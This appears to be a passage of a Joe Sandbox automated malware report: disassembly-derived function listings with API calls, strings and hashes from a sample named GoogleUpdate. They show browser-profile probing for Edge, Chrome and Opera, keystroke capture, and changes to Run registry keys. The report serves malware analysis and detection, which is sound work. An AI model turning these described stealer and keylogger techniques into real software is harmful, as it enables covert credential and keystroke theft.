                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                • API String ID: 1174141254-2800177040
                                • Opcode ID: 159f7fd17d1b243dae4a7ace972dcd937847c40b65fb35a0abdc828e2a633f8f
                                • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
                                • Opcode Fuzzy Hash: 159f7fd17d1b243dae4a7ace972dcd937847c40b65fb35a0abdc828e2a633f8f
                                • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                • API String ID: 1174141254-4188645398
                                • Opcode ID: 916fef2f778631c75ec8644c97e7d2ef853b56493246b695851a20b5b250d49e
                                • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
                                • Opcode Fuzzy Hash: 916fef2f778631c75ec8644c97e7d2ef853b56493246b695851a20b5b250d49e
                                • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: AppData$\Opera Software\Opera Stable\
                                • API String ID: 1174141254-1629609700
                                • Opcode ID: 150e870e7e5e4af8175d5cfa7ba5a62712d901fed90a36ab12f25508577606ff
                                • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
                                • Opcode Fuzzy Hash: 150e870e7e5e4af8175d5cfa7ba5a62712d901fed90a36ab12f25508577606ff
                                • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: 0Zj
                                • API String ID: 269201875-907608346
                                • Opcode ID: 236c1eb35750adf7c97d481cc106614635bd8075b301b45bd990d5e3345ade9a
                                • Instruction ID: 2da6b69c26c345968169ae82ae00459ec8aec7f537a5c8756946128e80711ba3
                                • Opcode Fuzzy Hash: 236c1eb35750adf7c97d481cc106614635bd8075b301b45bd990d5e3345ade9a
                                • Instruction Fuzzy Hash: 5EE02B62A0553460F621273F3C49B6B15849BC137AF21033FF664861D1FF7C485A615E
                                APIs
                                • GetKeyState.USER32(00000011), ref: 0040A597
                                  • Part of subcall function 00409468: GetForegroundWindow.USER32(00472008,?,00472008), ref: 0040949C
                                  • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                  • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                  • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                                  • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                                  • Part of subcall function 00409468: ToUnicodeEx.USER32(0000005B,0000005B,?,?,00000010,00000000,00000000), ref: 004094E1
                                  • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                • String ID: [AltL]$[AltR]
                                • API String ID: 3195419117-2658077756
                                • Opcode ID: 95818baf887a83fbd095ba787890aaff40716197e7bc3e10cf8f15d14301b647
                                • Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
                                • Opcode Fuzzy Hash: 95818baf887a83fbd095ba787890aaff40716197e7bc3e10cf8f15d14301b647
                                • Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF
                                APIs
                                • GetKeyState.USER32(00000012), ref: 0040A5F1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: State
                                • String ID: [CtrlL]$[CtrlR]
                                • API String ID: 1649606143-2446555240
                                • Opcode ID: 8632b80a32c9fa32f21b550938a6eee15c3a690095e5f6be671f0c8cc692680c
                                • Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
                                • Opcode Fuzzy Hash: 8632b80a32c9fa32f21b550938a6eee15c3a690095e5f6be671f0c8cc692680c
                                • Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BD02,00000000,?,00472200,pth_unenc,0gj), ref: 00412422
                                • RegDeleteValueW.ADVAPI32(?,?,?,00472200,pth_unenc,0gj), ref: 00412436
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412420
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteOpenValue
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                • API String ID: 2654517830-1051519024
                                • Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                • Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
                                • Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                • Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664
                                APIs
                                • TerminateProcess.KERNEL32(00000000,0gj,0040E2B2), ref: 004112C5
                                • WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ObjectProcessSingleTerminateWait
                                • String ID: 0gj
                                • API String ID: 1872346434-1559316900
                                • Opcode ID: 3250c3065a615e5fa00de520b6f6c814d77e8e8054cf58f577d93f1f98329294
                                • Instruction ID: b5655bab4260c8b751e52e8c7bcc6e4b5c94833391ebbdcfa87c891e0d6e2540
                                • Opcode Fuzzy Hash: 3250c3065a615e5fa00de520b6f6c814d77e8e8054cf58f577d93f1f98329294
                                • Instruction Fuzzy Hash: 3ED022301452009FEB001BB0BC08B003B68A708332F204372F9A2822F0D7F6D818AA1A
                                APIs
                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433064
                                  • Part of subcall function 00432FCD: std::exception::exception.LIBCONCRT ref: 00432FDA
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433072
                                  • Part of subcall function 00436EC6: RaiseException.KERNEL32(?,?,00433057,?,?,?,00000000,?,?,?,P@,00433057,?,0046B09C,00000000), ref: 00436F25
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                • String ID: P@
                                • API String ID: 1586462112-676759640
                                • Opcode ID: d34f057b204cbc7e51539216932af2e5b0516ce62ca17289c65ad8c524a6b4fa
                                • Instruction ID: 0bfe0c8ac6dbc9b0d4453f7df384559b02cf33d5589a4338b6e2a72978291aeb
                                • Opcode Fuzzy Hash: d34f057b204cbc7e51539216932af2e5b0516ce62ca17289c65ad8c524a6b4fa
                                • Instruction Fuzzy Hash: 5CC08034C0020C77CB00F6E1C907C8D773C5D04300F405416B51091081E774531D96D5
                                APIs
                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433044
                                  • Part of subcall function 00432F76: std::exception::exception.LIBCONCRT ref: 00432F83
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433052
                                  • Part of subcall function 00436EC6: RaiseException.KERNEL32(?,?,00433057,?,?,?,00000000,?,?,?,P@,00433057,?,0046B09C,00000000), ref: 00436F25
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                • String ID: P@
                                • API String ID: 1586462112-676759640
                                • Opcode ID: 0f635586152ab29110567b9c987066954b21ef4f476975f95e78209acc4c7d60
                                • Instruction ID: 865ee2ddef0a897f612f6fb2ad11127a6c44acc13293d016e759f8d59b40e8c3
                                • Opcode Fuzzy Hash: 0f635586152ab29110567b9c987066954b21ef4f476975f95e78209acc4c7d60
                                • Instruction Fuzzy Hash: 15C08034C0010CB7CB00FAF5D907D8E773C5904340F409015B61091041E7B8631C87C5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CommandLine
                                • String ID: 5g
                                • API String ID: 3253501508-2513871569
                                • Opcode ID: cae20f9730f5ace7650722f8577f4badf597048a844bd8defe5601c9d896c31e
                                • Instruction ID: ed7793de650037ca68a065bd14f32765b676cca72e00cc30cceafd45c2a83d08
                                • Opcode Fuzzy Hash: cae20f9730f5ace7650722f8577f4badf597048a844bd8defe5601c9d896c31e
                                • Instruction Fuzzy Hash: A8B092788007008FCB108FB0B80C0143BA0B6182073C15176DC8EC3F22E7758008DF09
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                                • GetLastError.KERNEL32 ref: 0043B4E9
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorLast
                                • String ID:
                                • API String ID: 1717984340-0
                                • Opcode ID: 570887f611a5d1f74d34073c32c2f77717d7cd84bcf1f9b239cc9e46d00ed125
                                • Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
                                • Opcode Fuzzy Hash: 570887f611a5d1f74d34073c32c2f77717d7cd84bcf1f9b239cc9e46d00ed125
                                • Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799
                                APIs
                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004106DF
                                • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastRead
                                • String ID:
                                • API String ID: 4100373531-0
                                • Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                • Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
                                • Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                • Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19